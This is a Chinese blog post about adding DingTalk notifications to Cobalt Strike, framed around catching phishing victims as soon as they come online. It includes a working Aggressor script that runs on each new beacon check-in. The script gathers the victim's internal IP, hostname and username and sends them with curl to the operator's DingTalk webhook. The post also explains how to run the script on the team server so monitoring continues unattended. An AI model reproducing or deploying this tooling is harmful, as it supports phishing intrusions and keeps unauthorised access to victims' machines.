<!DOCTYPE html>
<html>
<head>
  <title>
    Keyi 的日常  - cs上线钉钉提醒 
  </title>
  <meta charset="utf-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1" />

  
  <link rel="shortcut icon" href="/favicon.ico" />
  

  
<link rel="stylesheet" href="/css/style.css">

  <link href="https://google-fonts.mirrors.sjtug.sjtu.edu.cn/css?family=Noto+Sans+SC&display=swap" rel="stylesheet">

  
  

  
<link rel="stylesheet" href="/css/iDisqus.min.css">

  
<script src="/js/iDisqus.min.js"></script>


  <script>
  var disq = new iDisqus('comment', {
      forum: 'pcrab-blog',
      api: 'https://disqus.pcrab.ml',
      site: 'https://fanyibo2009.github.io',
      mode: 1,
      timeout: 3000,
      init: true
  });
  </script>
  
  

  <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="垃圾箱" type="application/atom+xml">
</head>

<body>
  <div class="title">
  <img class="title_img" src="https://fanyibo2009.github.io/images/icon.png"/><br>
  <p id="site_title">&nbspKeyi 的日常&nbsp</p>
</div>

  <div class="navi">
    <a id="navi_item" href="/#" class="menu-item-link">Home</a>
    <a id="navi_item" href="/tags" class="menu-item-link">tags</a>
    <a id="navi_item" href="/about" class="menu-item-link">about</a>
    <a id="navi_item" href="/search" class="menu-item-link">search</a>
</div>

<hr/>


  <div class="main">
    <post>

  <div class="post_title">
    cs上线钉钉提醒
  </div>

  <br/><br/>

  <div id="post_content">
    <blockquote>
<p>平时钓鱼或者在吃饭的时候不能时刻盯着cs，原来一直使用<a target="_blank" rel="noopener" href="https://sct.ftqq.com/sendkey">server酱</a>进行cs上线提醒，后续发现他开始收费了，那鱼儿上线后就无法及时进行维权。所以想通过钉钉webhook进行提醒</p>
</blockquote>
<p>效果如下：<br><img src="media/16275491678306/16275510645002.jpg" alt=""></p>
<h2 id="搭建步骤"><a href="#搭建步骤" class="headerlink" title="搭建步骤"></a>搭建步骤</h2><h3 id="一-新建个人群聊"><a href="#一-新建个人群聊" class="headerlink" title="一.新建个人群聊"></a>一.新建个人群聊</h3><p>这个功能是群通知的功能，我们要建立个人群聊。<br>打开<code>手机版钉钉</code>-&gt;右上角点击<code>发起群聊</code>-&gt;<code>面对面建群</code><br>注意：电脑版的钉钉不可以！</p>
<h3 id="二-接下来在群聊里新建webhook"><a href="#二-接下来在群聊里新建webhook" class="headerlink" title="二.接下来在群聊里新建webhook"></a>二.接下来在群聊里新建webhook</h3><p><code>点击设置</code>-<code>智能群助手</code>-<code>添加机器人</code>-<code>自定义</code></p>
<p><img src="media/16275491678306/16275505505637.jpg" alt=""></p>
<p>接着进行对机器人添加<code>自定义关键词</code>=“CS”</p>
<p><img src="media/16275491678306/16275506099188.jpg" alt=""></p>
<h3 id="三-导入dingtalk-webhook-cna-到cs"><a href="#三-导入dingtalk-webhook-cna-到cs" class="headerlink" title="三.导入dingtalk_webhook.cna 到cs"></a>三.导入dingtalk_webhook.cna 到cs</h3><p>下载<a href="">dingtalk_webhook.cna</a>，修改dingtalk_webhookURL内容为自己的token<br><img src="media/16275491678306/16275522427259.jpg" alt=""></p>
<p>代码如下：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">#author: 无尾熊/keyi</span><br><span class="line"></span><br><span class="line">#set this info:</span><br><span class="line"></span><br><span class="line">$dingtalk_webhookURL = &#x27;https://oapi.dingtalk.com/robot/send?access_token=【webhook的token】&#x27;;</span><br><span class="line"></span><br><span class="line">on beacon_initial &#123;</span><br><span class="line"></span><br><span class="line">    println(&quot;Initial Beacon Checkin: &quot; . $1 . &quot; PID: &quot; . beacon_info($1, &quot;pid&quot;));</span><br><span class="line">    local(&#x27;$internalIP $computerName $userName&#x27;);</span><br><span class="line">    $internalIP = replace(beacon_info($1, &quot;internal&quot;), &quot; &quot;, &quot;_&quot;);</span><br><span class="line">    $computerName = replace(beacon_info($1, &quot;computer&quot;), &quot; &quot;, &quot;_&quot;);</span><br><span class="line">    $userName = replace(beacon_info($1, &quot;user&quot;), &quot; &quot;, &quot;_&quot;);</span><br><span class="line">    $message = &#x27;CobaltStrike上线提醒:\n&#x27;.$teamserver_hostname.&#x27;主机名称:&#x27;.$computerName.&#x27;\nUsername : &#x27;.$userName.&#x27;\nIpaddres : &#x27;.$internalIP;</span><br><span class="line"></span><br><span class="line">	@curl_command = @(&#x27;curl&#x27;,&#x27;-H&#x27;,&#x27;Content-Type: application/json&#x27;,&#x27;POST&#x27;,&#x27;--data&#x27;,&#x27;&#123;&quot;msgtype&quot;:&quot;text&quot;,&quot;text&quot;:&#123;&quot;content&quot;:&quot;CS&#x27;.$message.&#x27;&quot;&#125;&#125;&#x27;,$dingtalk_webhookURL) ;</span><br><span class="line">	exec(@curl_command);</span><br><span class="line">	</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="四-持续监控"><a href="#四-持续监控" class="headerlink" title="四.持续监控"></a>四.持续监控</h3><p>电脑断网后beacon上线后钉钉无提醒？<br>原因是：在cs客户端关闭后，加载的插件将无法运行，所以我们需要在cs的服务端去运行插件</p>
<p>agscript使用方法<br>    ./agscript [host] [port] [user] [pass]<br>        Connect to a team server and start the Aggressor Script console</p>
<pre><code>./agscript [host] [port] [user] [pass] &lt;/path/to/file.cna&gt;
    Connect to a team server and execute the specified script</code></pre><h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1512736">Cobalt Strike beacon上线通知cna脚本</a><br><a target="_blank" rel="noopener" href="https://github.com/michalkoczwara/aggressor_scripts_collection/blob/master/slack-notify-beacon.cna">slack-notify-beacon.cna</a></p>

  </div>

  <br/><br/><br/><br/>

  

  <div class="copyright" >

    <a class="license-image" rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by
-nc
-sa
/4.0/"><img alt="知识共享许可协议" style="border-width:0" src="https://i.creativecommons.org/l/by-sa/4.0/80x15.png" /></a>

    <div>

      <p>本作品采用

      <a class="license-word-hyper" rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by
-nc
-sa
/4.0/">
        知识共享署名
-非商业性使用
-相同方式共享
4.0 国际许可协议</a>

      进行许可。</p>

    </div>

    </div>


  <div id="top">
    <a href="#">▲</a>
    <a href="#footer">▼</a>
</div>

  


<div id="comment"></div>





</post>

  </div>

  <foot id="footer">
  <hr class="boldline"/>
  <p class="center font">
    &copy - <a target="_blank" rel="noopener" href="https://fanyibo2009.github.io">无尾熊</a> -  2019 -  2021 - Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">hexo</a> 
  </p>
  <br/>
</foot>

</body>
</html>
